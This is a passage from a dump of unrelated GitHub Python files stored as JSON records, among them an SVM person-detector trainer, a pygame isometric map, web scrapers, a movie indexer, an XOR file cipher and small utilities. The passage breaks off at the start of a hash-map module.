+ r'\\data\\INRIAPerson\\INRIAPerson\\\\'[:-1] + mode \\\n + r'_64x128_H96\\\\'[:-1] + category\n # 此变量为图片名称,例:train_pos_paths\n locals()[mode + '_' + category + '_paths'] = os.listdir(locals()[mode + '_' + category + '_path'])\n # 此变量为图片数量,例:train_pos_num\n locals()[mode + '_' + category + '_num'] = len(locals()[mode + '_' + category + '_paths'])\n print(category + '类的' + mode + '数据集有' + str(locals()[mode + '_' + category + '_num']) + '个样本')\n # 读取图片的灰度图,转换为128*64大小,并保存在numpy数组中\n # 此变量为图片数组,例:train_pos_data\n locals()[mode + '_' + category + '_data'] = np.empty((locals()[mode + '_' + category + '_num'], 128, 64))\n for i, path in enumerate(locals()[mode + '_' + category + '_paths']):\n img = imread(locals()[mode + '_' + category + '_path'] + r'\\\\'[:-1] + path, as_gray=True)\n if img.shape[0] > img.shape[1]:\n img = resize(img, (128, 64))\n else:\n img = resize(img, (int(img.shape[0]*64/img.shape[1]), 64))\n top = int((128 - img.shape[0])/2)\n bottom = 128 - top - img.shape[0]\n img = cv.copyMakeBorder(img, top, bottom, 0, 0, cv.BORDER_CONSTANT, value=(255, 255, 255))\n locals()[mode + '_' + category + '_data'][i] = img\n\n# 保存数据\ndata = {\n 'train_pos_data': train_pos_data,\n 'train_neg_data': train_neg_data,\n 'test_pos_data': test_pos_data,\n 'test_neg_data': test_neg_data,\n 'train_pos_target': np.ones(train_pos_num),\n 'train_neg_target': np.zeros(train_neg_num),\n 'test_pos_target': np.ones(test_pos_num),\n 'test_neg_target': np.zeros(test_neg_num)\n}\n\n# 提取图片的hog特征,保存到数组中\nfor mode, category in product(('train', 'test'), ('pos', 'neg')):\n example_hog, _ = extract_hog(locals()[mode + '_' + category + '_data'][0], params_hog['orientations'],\n params_hog['pixels_per_cell'], params_hog['cells_per_block'],\n params_hog['visualize'], params_hog['transform_sqrt'])\n locals()[mode + '_' + category + '_hog'] = np.empty((locals()[mode + '_' + category + '_data'].shape[0],\n len(example_hog)))\n for i in range(locals()[mode + '_' + category + '_data'].shape[0]):\n hog_feature = extract_hog(locals()[mode + '_' + category + '_data'][i], params_hog)\n locals()[mode + '_' + category + '_hog'][i] = hog_feature\ndata['train_pos_hog'] = train_pos_hog\ndata['train_neg_hog'] = 
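The tracker script above calls `cv2.MultiTracker_create()` / `cv2.TrackerCSRT_create()`, which exist only in opencv-contrib builds and moved under `cv2.legacy` around OpenCV 4.5. A version-tolerant constructor, assuming one of the two layouts is present:

```python
import cv2

def make_multitracker():
    # Older contrib builds expose the constructor at top level; 4.5+ moved it.
    if hasattr(cv2, "MultiTracker_create"):
        return cv2.MultiTracker_create()
    return cv2.legacy.MultiTracker_create()

def make_csrt():
    if hasattr(cv2, "TrackerCSRT_create"):
        return cv2.TrackerCSRT_create()
    return cv2.legacy.TrackerCSRT_create()
```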
train_neg_hog\ndata['test_pos_hog'] = test_pos_hog\ndata['test_neg_hog'] = test_neg_hog\n\n# 训练SVM模型\n# 1.设置训练数据\ntrain_hog = np.vstack((data['train_pos_data'], data['train_neg_data'])).reshape((-1, 128*64))\ntrain_target = np.vstack((data['train_pos_target'], data['train_neg_target']))\n\n# 2.1径向基支持向量机\nsvc_1 = SVC(C=0.01, kernel='rbf', class_weight={0:1, 1:10})\nsvc_1.fit(train_hog, train_target)\n\n# #2.2线性核支持向量机(损失函数为Hinge)\nsvc_2 = LinearSVC(C=1, class_weight={0:1, 1:10})\nsvc_2.fit(train_hog, train_target)\n\n# 3.测试的结果显示,线性核的结果已经足够好了\ntest_hog = np.vstack((data['test_pos_hog'], data['test_neg_hog'])).reshape((test_pos_num + test_neg_num, -1))\npred_target = svc_2.predict(test_hog)\ntest_target = np.hstack((data['test_pos_target'], data['test_neg_target']))\nprint(np.mean(test_target == pred_target))\nprint(pred_target)\n\n# 下一步行动\n# 1.目标检测","repo_name":"moyidou/human_detector","sub_path":"detector/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36509019950","text":"import pandas as pd\n#from dataCapture import findUserIndex\nimport dataCapture as dc\n\ndef matchUsers(df, username):\n destination = df.iloc[dc.findUserIndex(df, username)][\"Destination\"][0]\n matchedUsers = []\n\n for i in range(len(df.index)):\n if df.iloc[i][\"User Name\"] != username and df.iloc[i][\"Destination\"][0] == destination:\n tempdf = df.iloc[i]\n matchedUsers.append({'Username' : tempdf[\"User Name\"],\n 'Email' : tempdf[\"Email\"], \n 'Origin' : tempdf[\"Origin\"],\n 'Destination' : tempdf[\"Destination\"]})\n\n#email, destination, origin, username\n return matchedUsers\n\n#testFrame = dc.readUserData(\"userData.pkl\")\n\n#dc.addUserInfo(testFrame, \"killian\", \"killian@gmail.com\", \"Password\", \"Your moms house\")\n\n#dc.modifySeats(testFrame, \"killian\", 3)\n#dc.modifyDestination(testFrame, \"killian\", \"Your dads house\")\n#dc.modifyPassengers(testFrame, \"killian\", [\"evan\", \"tyler\"])\n#dc.modifyDestination(testFrame, \"admin\", \"Your dads house\")\n\n#users = matchUsers(testFrame, \"admin\")\n\n#print(users)","repo_name":"mattcspeights/Howdy-Hack-2022","sub_path":"flaskr/matchUsers.py","file_name":"matchUsers.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18914969891","text":"import pygame\nfrom scripts.constants import *\nfrom scripts.assets import *\n\n# Vytvoreni bloku\n\n\nclass Block:\n def __init__(self, x, y, width, height, image, floor, action=''):\n self.x = x\n self.y = y\n self.width = 64\n self.height = 64\n self.image = image\n self.image = pygame.transform.scale(\n self.image, (width, height))\n self.rect = self.image.get_rect(topleft=(self.x, self.y))\n self.floor = floor\n self.action = action\n\n def draw(self):\n # Vytvoření posunu všech bloků\n off_set = NUMBER_OF_BLOCKS * \\\n (NUMBER_OF_BLOCKS / 2 / NUMBER_OF_BLOCKS) * \\\n self.width - self.width / 2\n\n # Upravování pozice na základě obdržené pozice (x, y)\n self.rect.x = (self.x * 1 + self.y * -1) * self.width / 2 + off_set\n self.rect.y = (self.x * 0.5 + self.y * 0.5) * self.height / 2\n\n # Zobrazení bloku\n SCREEN.blit(self.image, self.rect)\n self.collide_point = pygame.Rect(\n self.rect.centerx - 5, self.rect.centery - 10, 15, 1)\n\n # Bod kolize\n if HITBOX:\n pygame.draw.rect(SCREEN, RED, self.collide_point)\n\n # pygame.draw.polygon(SCREEN, (255, 255, 255), [\n # 
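The HOG training script above writes variables through `locals()[mode + '_' + category + ...]`, which only works at module scope (where `locals()` is `globals()`) and silently breaks inside a function. A dictionary keyed by the same `product(...)` combinations is the robust equivalent and removes the pre-declared placeholders:

```python
from itertools import product

data = {}
for mode, category in product(('train', 'test'), ('pos', 'neg')):
    key = f"{mode}_{category}"
    data[f"{key}_paths"] = []          # os.listdir(current_path) in the real script
    data[f"{key}_num"] = len(data[f"{key}_paths"])
    data[f"{key}_hog"] = None          # np.empty((num, feat_len)) once sizes are known

print(sorted(k for k in data if k.endswith("_num")))
```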
(self.rect.x + 32, self.rect.y + 8), (self.rect.x + 64, self.rect.y + 24), (self.rect.x + 32, self.rect.y + 40), (self.rect.x, self.rect.y + 24)])\n\n\nclass IsoMap:\n def __init__(self, map):\n self.map = map\n self.blocks = []\n\n def create_map(self):\n # Vytvoření herní mapy\n for floor in range(len(self.map)):\n for i in range(len(self.map[floor])):\n for j in range(len(self.map[floor])):\n if self.map[floor][i][j] == 0:\n continue\n elif self.map[floor][i][j] == 1:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, grass, floor))\n elif self.map[floor][i][j] == 2:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, grass1, floor))\n elif self.map[floor][i][j] == 3:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, grass2, floor))\n elif self.map[floor][i][j] == 4:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, stone, floor))\n elif self.map[floor][i][j] == 5:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, stone1, floor))\n elif self.map[floor][i][j] == 6:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, water, floor))\n elif self.map[floor][i][j] == 7:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, bush, floor, 'plant'))\n elif self.map[floor][i][j] == 8:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, flower, floor, 'plant'))\n elif self.map[floor][i][j] == 9:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, 180, 140, shop, floor, 'shop'))\n\n def draw(self, player, enemies, shop_menu):\n # Vykreslení vrstvy bloků za hráčem\n for layer1 in self.blocks:\n layer1.draw()\n # Kolize hráče s bloky\n if layer1.action != 'plant':\n player.collision(layer1)\n\n # Kolize nepřítele s bloky\n for enemy in enemies:\n enemy.collision(layer1)\n\n # Vykreslení hráče\n player.draw()\n\n # Vykreslení a určení druhé vrstvy bluků před hráčem\n for layer2 in self.blocks:\n # Když je blok o patro výše než hráč a jeho pozice y je vyšší, tak se vykreslí blok\n if layer2.floor > player.last_collistion and player.rect.bottom < layer2.rect.bottom - 16 or layer2.floor > player.last_collistion + 1:\n layer2.draw()\n\n # Kolize s obchodem a nasledný vstup do obchodu\n if layer2.action == 'shop' and player.rect.colliderect(layer2.collide_point) and layer2.floor == player.last_collistion + 1:\n shop_menu.pause = True\n shop_menu.update()\n\n # Vykreslení nepřítele a kolize s hráčem\n for enemy in enemies:\n enemy.draw()\n enemy.move(player)\n enemy.animation(enemies)\n player.collision_enemy(enemy)\n\n # pygame.draw.polygon(SCREEN, (255, 0, 0), [\n # (WIDTH/2, - PIXELS + 8), (WIDTH + PIXELS, HEIGHT/2), (WIDTH/2, HEIGHT + PIXELS / 2), (-2 * PIXELS + PIXELS, HEIGHT/2)], 2)\n","repo_name":"adammaly004/Isometrics_game","sub_path":"scripts/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4972075961","text":"#!/usr/bin/env python\n\nimport argparse\nfrom os.path import expanduser\nfrom pathlib import Path\n\nimport guessit\n\nfrom lib import load_config, imdbapi\nfrom lib.helper_index import search_moviedir\n\n\"\"\"\nThis script annotates all movie dirs with .imdb files\nin this file the id of the movies is stored.\n\"\"\"\n\n\n\ndef add_movie(directory, verbose=False):\n \"\"\" Recognizes a movie\n Returns the imdb id\n 
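The coordinate math in `Block.draw` above is the standard 2:1 isometric projection: grid coordinates are rotated 45 degrees and the vertical axis is halved. Factored into a pure function, with `tile_w`/`tile_h` standing in for `self.width`/`self.height` and the same `off_set` convention:

```python
def iso_to_screen(gx, gy, tile_w=64, tile_h=64, off_set=0):
    sx = (gx - gy) * tile_w / 2 + off_set   # matches (x*1 + y*-1) * width/2
    sy = (gx + gy) * tile_h / 4             # matches (x*0.5 + y*0.5) * height/2
    return sx, sy

print(iso_to_screen(0, 0), iso_to_screen(1, 0), iso_to_screen(0, 1))
# (0.0, 0.0) (32.0, 16.0) (-32.0, 16.0): east/south grid steps land on the 2:1 diamond
```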
\"\"\"\n\n # before trying to analyse the directory name, search for a file containing a imdb id\n imdb_id = search_moviedir(directory)\n if imdb_id is None:\n guess = guessit.guess_movie_info(directory.resolve(), info=['filename'])\n\n # print(guess.nice_string())\n # print(\"Correct (at least year and name)? (Y/n)\")\n # if getch().lower() == 'n':\n # pass\n if verbose:\n print(\"Directory:\", directory)\n print(\"guess:\", guess['title'], guess.get('year', ''))\n\n try:\n imdb_id, _ = imdbapi.search(guess['title'], guess.get('year', ''))\n except TypeError:\n # None not iterable\n pass\n\n # if (len(search) == 0):\n # search = ia.search_movie(guess['title'])\n\n # print(\"Results:\")\n # for item in search:\n # print(item['long imdb canonical title'])\n\n # print(\"Choosing first\")\n # result = ia.get_movie(search[0].movieID)\n # ia.update(result, 'keywords')\n\n if imdb_id:\n fh = (directory / '.imdb').open('w')\n fh.write(imdb_id)\n print(\"Stored\", directory)\n\n else:\n print(\"Error for:\", directory)\n\n\ndef is_annotated(directory):\n return len(list(directory.glob('**/.imdb'))) > 0\n\n\ndef index(verbose=False, force=False):\n config = load_config()\n for movies_dir in config.directories:\n d = Path(expanduser(movies_dir))\n for subd in d.iterdir():\n if not is_annotated(subd) or force:\n add_movie(subd, verbose)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Indexer')\n parser.add_argument('--verbose', '-v', action='store_true',\n help='')\n parser.add_argument('--force', action='store_true',\n help='Force the reparsing of the movie folder')\n # parser.add_argument('directory', nargs='?')\n args = parser.parse_args()\n\n index(verbose=args.verbose, force=args.force)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"koppa/moviedb","sub_path":"moviedb_index.py","file_name":"moviedb_index.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37550141408","text":"# Script for converting .xml files to aligned sentences\r\n\r\nimport xml.etree.ElementTree as ET\r\n\r\ndata_en = ET.parse('data/vojska-en.xml')\r\ndata_sl = ET.parse('data/vojska-sl.xml')\r\n\r\nsentences_en = data_en.findall(\"seg\")\r\nsentences_sl = data_sl.findall(\"seg\")\r\n\r\ntgt_en = \"vojska-en.txt\"\r\ntgt_sl = \"vojska-sl.txt\"\r\n\r\nfor sentence_en in sentences_en:\r\n corr_sl = sentence_en.get('corresp')\r\n new_s_en = ''\r\n new_s_sl = ''\r\n for word in sentence_en:\r\n new_s_en += word.text + ' '\r\n for word in data_sl.find(\".//*[@id='\" + corr_sl + \"']\"):\r\n new_s_sl += word.text + ' '\r\n\r\n with open('data/' + tgt_en, 'a', encoding='utf-8') as file:\r\n file.write(new_s_en[:-1] + '\\n')\r\n\r\n with open('data/' + tgt_sl, 'a', encoding='utf-8') as file:\r\n file.write(new_s_sl[:-1] + '\\n')\r\n\r\n","repo_name":"VenoGaube/NLP","sub_path":"helper_functions/convert_xml.py","file_name":"convert_xml.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30490090998","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\n# for comparing text of 2 places (own logic)\ndef compareString(str1, str2):\n count = 0\n string1 = str1.lower()\n string2 = str2.lower()\n for i in list(string1.split()):\n for j in list(string2.split()):\n if i == j:\n count = count + 1\n return (2 * count) / (len(string1.split()) + len(string2.split()))\n\n\ndef printParagraph(state, inp):\n url1 = 
\"http://www.transindiatravels.com/\" + state + \"/\" + inp + \"/\" + \"tourist-places-to-visit-in-\" + inp\n url2 = \"http://www.transindiatravels.com/\" + state + \"/\" + \"tourist-places-to-visit-in-\" + state\n if inp == state:\n url3 = url2\n else:\n url3 = url1\n html = requests.get(url3).text\n # soup = BeautifulSoup(driver.page_source, 'lxml')\n soup = BeautifulSoup(html)\n all_links = soup.find('article')\n sp1 = all_links.find_all('h2')\n sp2 = all_links.find_all('p')\n i = 0\n # for i in range(len(sp1)):\n # print(sp1[i].text)\n my_liss = []\n for i in range(len(sp2)):\n # print(sp2[i].text)\n my_liss.append(sp2[i].text)\n # print()\n return my_liss\n\n\ndef main_funct(state, inp):\n temp = \"\"\n for i in inp.split():\n temp += i + \"-\"\n inp = temp[:-1]\n # temporary list and dictionary objects to be used in the program later\n places = []\n # for storing count of occurance of places from different travel web-sites\n count_dict = {}\n # List for removing unnecessary places like airport, hotel etc.\n unnessaryLis = [\"stores\", \"theatre\", \"dhaba\", \"shop\", \"bar\", \",\", \"[\", \"]\", \"airport\",\n \"airline\", \"bed\", \"medical\", \"hospitals\", \"pub\", \"taxi\", \"residency\", \"pvr\",\n \"mcdonald\", \"tea\", \"chaat\", \"chat\", \"donald\", \"kfc\", \"metro\", \"emergency\",\n \"lodge\", \"stay\", \"helpline\", \"g\", \"zealand\", \"korea\", \"nepal\", \"mongolia\",\n \"rwanda\", \"poland\", \"finland\", \"utter\", \"side\", \"[email\", \"deluxe\", \"palace\",\n \"states\", \"united\", \"canada\", \"vietnam\", \"thailand\", \"arabia\", \"malaysia\",\n \"japan\", \"emirates\", \"pakistan\", \"japan\", \"italy\", \"indonesia\", \"greece\",\n \"germany\", \"france\", \"china\", \"brazil\", \"australia\", \"clinic\", \"lanka\",\n \"netherlands\", \"israel\", \"iran\", \"georgia\", \"russia\", \"egypt\", \"belgium\",\n \"argentina\", \"afghanistan\", \"djibouti\", \"czech\", \"terminus\", \"terminal\",\n \"enquiry\", \"chemist\", \"guest\", \"cafe\", \"ambulance\", \"hospital\", \"cab\", \"cabs\",\n \"railways\", \"station\", \"hotel\", \"restaurant\", \"inn\", \"break\", \"police\",\n \"airline\", \"travels\"]\n\n # list of links we want to scrape for getting data with their required parameters.\n url = [[\"https://wikitravel.org/en/\" + inp, \"span\", \"fn org\"],\n [\"https://en.wikivoyage.org/wiki/\" + inp, \"span\", \"fn org listing-name\", 0],\n [\"https://www.holidify.com/places/\" + inp + \"/sightseeing-and-things-to-do.html\", \"h2\",\n \"card-heading\"], [\n \"http://www.transindiatravels.com/\" + state + \"/\" + inp + \"/tourist-places-to-visit-in-\" + inp,\n \"h2\", \"\"]]\n\n # traversing the links and getting url requests and having data according to required format.\n for link in url:\n # getting html object\n html = requests.get(link[0]).text\n soup = BeautifulSoup(html)\n all_links = soup.find_all(link[1], class_=link[2])\n for link1 in all_links:\n required = True\n temp = list((link1.text).split())\n for i in temp:\n if i.lower() in unnessaryLis:\n required = False\n break\n if (required):\n placeName = link1.text\n for i in range(len(placeName)):\n if ((placeName[i] >= 'a' and placeName[i] <= 'z') or (\n placeName[i] >= 'A' and placeName[i] <= 'Z')):\n placeName = placeName[i:]\n break\n places.append(placeName)\n # print(places)\n\n for place in places:\n temp = place\n delKey = ''\n prevCount = 0\n for key in count_dict.keys():\n if compareString(key, place) >= 0.4:\n # If the length of the previous key is greter than the new place name\n # 
Replace the old key with new one.\n if (len(key) > len(place)):\n delKey = key\n prevCount = count_dict[key]\n else:\n temp = key\n break\n try:\n if delKey == '':\n count_dict[temp] += 1\n else:\n del (count_dict[delKey])\n count_dict[place] = prevCount + 1\n except:\n count_dict[temp] = 0\n # print(count_dict)\n\n sorted_dict = sorted(((value, key) for (key, value) in count_dict.items()), reverse=True)\n j = 1\n lists = []\n for i in sorted_dict:\n xx = \"\"\n if j < 41:\n # print(j,\". \",end=\"\")\n # print(i[1])\n xx += str(j) + \".\" + i[1]\n lists.append(xx)\n else:\n break\n j += 1\n printParagraph(state, inp)\n return lists\n","repo_name":"pujith22/TouristIndia","sub_path":"app/src/main/python/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22122595896","text":"from django import template\nfrom django.utils.translation import ungettext\n\nregister = template.Library()\n\n@register.filter\ndef externalservicetoken_count(user):\n count = user.externalservicetoken_set.filter(authorized=True).count()\n return ungettext('%(count)d service', '%(count)d services', count) % {\n 'count': count\n }\n","repo_name":"mollyproject/mollyproject","sub_path":"molly/auth/templatetags/molly_auth.py","file_name":"molly_auth.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"40"} +{"seq_id":"30925174282","text":"\"\"\"\nThis is a very time consuming method. Do not use it for any purpose other than\ntesting.\n\"\"\"\n\nimport json\nimport encrypt as e\n\nGkey = 'whatever'\n\ndef setKey(Pkey):\n \"\"\"\n Global key is set. Do not use default.\n \"\"\"\n global Gkey\n if type(Pkey) == str:\n for Li in Pkey:\n if Li not in 'abcdefghijklmnopqrstuvwxyz':\n print('Invalid key')\n return 1\n Gkey = Pkey\n print('\\n\\nKey set to: ', Pkey, '\\n\\nDo not forget this key. It will not be displayed again.\\n\\n')\n return 0\n else:\n print('Invalid key')\n return 1\n \ndef getNLines(Pn, Pval):\n \"\"\"\n Reads n lines of ip and returns a list of strings.\n \"\"\"\n temp = []\n for Li in range(Pn):\n temp.append(input(Pval + \", Line \" + str(Li + 1) + \": \"))\n return temp\n\ndef createRecord():\n \"\"\"\n Reads questions, options and other data.\n \"\"\"\n Lrecord = []\n\n for Li in ['Question', 'Option1', 'Option2', 'Option3', 'Option4']:\n Ls = \"\\nEnter the number of lines of \" + Li + \": \"\n while True:\n try:\n Ln = int(input(Ls))\n break\n except:\n print('Please enter a number')\n Lrecord.append(getNLines(Ln, Li))\n\n for Li in ['Correct answer', 'Score']:\n while True:\n try:\n Ln = int(input(\"\\nEnter \" + Li + \": \"))\n if Ln in range(1,5):\n Lrecord.append([str(Ln)])\n else:\n print(\"Please enter a number in range 1-4\")\n continue\n break\n except:\n print('Please enter a number in range 1-4')\n return e.encryptRecord(Lrecord, Gkey)\n\ndef writeToFile(Pfile, Pmode = 'a'):\n \"\"\"\n Write records into Pfile as json data.\n \"\"\"\n Lcount = 0\n fp = open(Pfile, Pmode)\n while True:\n LrecordString = json.dumps(createRecord()) + '\\n'\n temp = fp.write(LrecordString)\n Lcount += 1\n while True:\n Lin = input('Add another record? 
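`compareString` above computes a token-overlap ratio of the Dice form 2·matches/(|A|+|B|), but its nested loops count duplicated tokens multiple times. A set-based version is both linear-time and the textbook coefficient:

```python
def dice_similarity(a: str, b: str) -> float:
    ta, tb = set(a.lower().split()), set(b.lower().split())
    if not ta and not tb:
        return 0.0
    return 2 * len(ta & tb) / (len(ta) + len(tb))

print(dice_similarity("Charminar Hyderabad", "The Charminar"))  # 2*1/(2+2) = 0.5
```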
(Y/N): ')\n if Lin == 'Y' or Lin == 'y' or Lin == 'N' or Lin == 'n':\n break\n if Lin == 'N' or Lin == 'n':\n break\n print(Lcount, \"records created\")\n return 0\n\ndef main():\n \"\"\"\n \n \"\"\"\n while True:\n temp = setKey(input(\"Please enter a valid string to set as key: \"))\n if temp == 0:\n break\n LofName = input(\"Enter the name of the output file: \")\n while True:\n Lmode = input(\"Enter mode (a/w): \")\n if Lmode == 'a' or Lmode == 'w':\n break\n else:\n print('Please enter a valid mode.')\n helper(LofName, Lmode)\n","repo_name":"praroh2/McqTester","sub_path":"generateQfileManually.py","file_name":"generateQfileManually.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36048252453","text":"from spider_template import GGVenturesSpider\n\nclass Gbr0023Spider(GGVenturesSpider):\n name = 'gbr_0023'\n country = 'United Kingdom'\n start_urls = [\"https://www.northumbria.ac.uk/about-us/academic-departments/newcastle-business-school/contact-us/\"]\n # eventbrite_id = 47699605203\n # TRANSLATE = True\n\n # handle_httpstatus_list = [301,302,403,404,429]\n\n static_name = \"Northumbria University,Newcastle Business School\"\n static_logo = \"https://www.northumbria.ac.uk/-/media/40f0efdb3a6745fda5b0d982d53b8cd9.ashx\"\n\n # MAIN EVENTS LIST PAGE\n parse_code_link = \"https://www.northumbria.ac.uk/about-us/news-events/events/\"\n\n university_contact_info_xpath = \"//div[@class='rich-text']\"\n # contact_info_text = True\n contact_info_textContent = True\n # contact_info_multispan = True\n\n def parse_code(self,response):\n try:\n ####################\n self.driver.get(response.url)\n # self.check_website_changed(upcoming_events_xpath=\"//div[@id='content-bottom']//a\",checking_if_none=True)\n # self.ClickMore(click_xpath=\"//div[contains(@class,'cal_load-button')]/button\",run_script=True)\n # self.Mth.WebDriverWait(self.driver, 10).until(self.Mth.EC.frame_to_be_available_and_switch_to_it((self.Mth.By.XPATH,\"//iframe[@title='List Calendar View']\")))\n # for link in self.multi_event_pages(num_of_pages=6,event_links_xpath=\"//h3/a\",next_page_xpath=\"//a[text()='>>']\",get_next_month=True):\n for link in self.events_list(event_links_xpath=\"//article[@class='rich-text']//a\"):\n self.logger.debug(f\"LINK: |{link}|\")\n self.getter.get(link)\n if self.unique_event_checker(url_substring=['northumbria.ac.uk']):\n self.Func.print_log(f\"Currently scraping --> {self.getter.current_url}\",\"info\")\n\n item_data = self.item_data_empty.copy()\n # self.Mth.WebDriverWait(self.driver, 10).until(self.Mth.EC.frame_to_be_available_and_switch_to_it((self.Mth.By.XPATH,\"//iframe[@title='Event Detail']\")))\n\n item_data['event_name'] = self.scrape_xpath(xpath_list=[\"//header[@class='course-heading']\"],method='attr')\n item_data['event_desc'] = self.scrape_xpath(xpath_list=[\"//div[@class='rich-text']\"],method='attr')\n # item_data['event_date'] = self.scrape_xpath(xpath_list=[\"//div[@class='gs-fromTablet6']\",\"//div[@class='rich-text']//h2\"],method='attr')\n # item_data['event_time'] = self.scrape_xpath(xpath_list=[\"//p[@class='time']\"],method='attr')\n\n item_data['event_date'] = self.get_datetime_attributes(\"//div[@class='calendar']//time\",'datetime')\n item_data['event_time'] = self.get_datetime_attributes(\"//p[@class='time']/time\",'datetime')\n\n # item_data['startups_contact_info'] = 
self.scrape_xpath(xpath_list=[\"//dt[text()='Contact']/..\"],method='attr',error_when_none=False)\n # item_data['startups_link'] = ''\n # item_data['startups_name'] = ''\n item_data['event_link'] = link\n\n yield self.load_item(item_data=item_data,item_selector=link)\n\n ####################\n except Exception as e:\n self.exception_handler(e)","repo_name":"kingcobra1325/ggventures-bot","sub_path":"ggventures/spiders/gbr_0023.py","file_name":"gbr_0023.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9880454250","text":"# program to approximate the value of pi\r\n# Auther: Nangamso Mgoqi\r\n# Date: 14 March 2014 \r\n \r\nimport math\r\nx = 2\r\ny = math.sqrt(2)\r\nz = 0\r\nwhile z!=1:\r\n \r\n z= 2/y\r\n \r\n x = x*z\r\n y = math.sqrt(2+y)\r\n \r\nprint(\"Approximation of pi:\", round(x,3))\r\nr = eval(input(\"Enter the radius:\\n\"))\r\nArea = x*r**2\r\nprint(\"Area:\", round(Area,3))\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_2/mgqnan002/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6993718409","text":"# 2020-06-19\n# Шифр Виженера\nimport argparse\nimport os.path\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument(\"srcfile\", metavar=\"src\", type=str, help=\"source filename\")\nparser.add_argument(\"dstfile\", metavar=\"dst\", type=str, help=\"destination filename\")\nparser.add_argument(\"--pwd\", metavar=\"password\", type=str, help=\"password\", required=True)\nparser.add_argument(\"--force\", default=False, action=\"store_true\", help=\"please mention to have existing file overwritten\")\nargs = parser.parse_args()\npwd = args.pwd\n\nbufsize = 1024\n\nif os.path.exists(args.srcfile):\n src = open(args.srcfile, \"rb\")\nelse:\n print(\"srcfile not found\")\n exit()\n\nif args.force or not os.path.exists(args.dstfile):\n dst = open(args.dstfile, \"wb\")\nelse:\n print(\"dstfile already exists. 
Use \\\"--force\\\" to overwrite it\")\n exit()\n\npos = 0\nwhile True:\n block = src.read(bufsize)\n if not block:\n break\n block2 = [ord('-')]*len(block)\n i = 0\n for b in block:\n pwd_char = pwd[pos % len(pwd)]\n dst_char = b ^ ord(pwd_char)\n # block2.append(dst_char)\n block2[i] = dst_char\n i += 1\n pos += 1\n\n dst.write(bytes(block2))\n\nsrc.close()\ndst.close()\n","repo_name":"boriksim/summer2020-tasks","sub_path":"task019-Vigenere-cipher/Vigenere-cipher.py","file_name":"Vigenere-cipher.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17544756578","text":"#!/usr/bin/python3\n\"\"\" Base Class Module \"\"\"\nimport json\n\n\nclass Base:\n \"\"\" Base Class \"\"\"\n __nb_objects = 0\n\n def __init__(self, id=None):\n \"\"\" init function \"\"\"\n if id is not None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\" Json list_dictories \"\"\"\n if list_dictionaries is None:\n return \"[]\"\n else:\n return json.dumps(list_dictionaries)\n","repo_name":"Kenfernandezjr/holbertonschool-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18457045958","text":"from typing import Union, Tuple, Dict, OrderedDict, Optional\n\nfrom collections import OrderedDict\nimport warnings\n\nimport torch\nimport torch.nn as nn\n\nfrom .common import _get_c_extension\n\nbackend = _get_c_extension()\n\n\n\"\"\"\nThe core differences between collision-free (ASH) and collision-allowed (NGP) hash map are:\n1. Collision-free requires spatial initialization, while collision-allowed does not.\n2. A query could fail in collision-free, while it will always succeed in collision-allowed.\n\nIn other words, forward function for collision-free modules will always return a result with a mask.\nThis is acceptable (and even desirable) for classical operations:\n- Marching Cubes\n- TSDF fusion\n- Sampling\n\nThis is problematic for (differentiable) neural operations:\n- Encoding\nOne work around would be using an padding_index=capacity and return encoding at this exact index\n feat_fg, mask_fg = ash_module.forward(x)\n\nAnother work around for this could be an additional low-resolution dense\n\"empty space grid\" equipped with contraction, which guarantees a valid result.\nThe interface would be similar to:\n feat_fg, mask_fg = ash_module.forward(x)\n feat_bg = 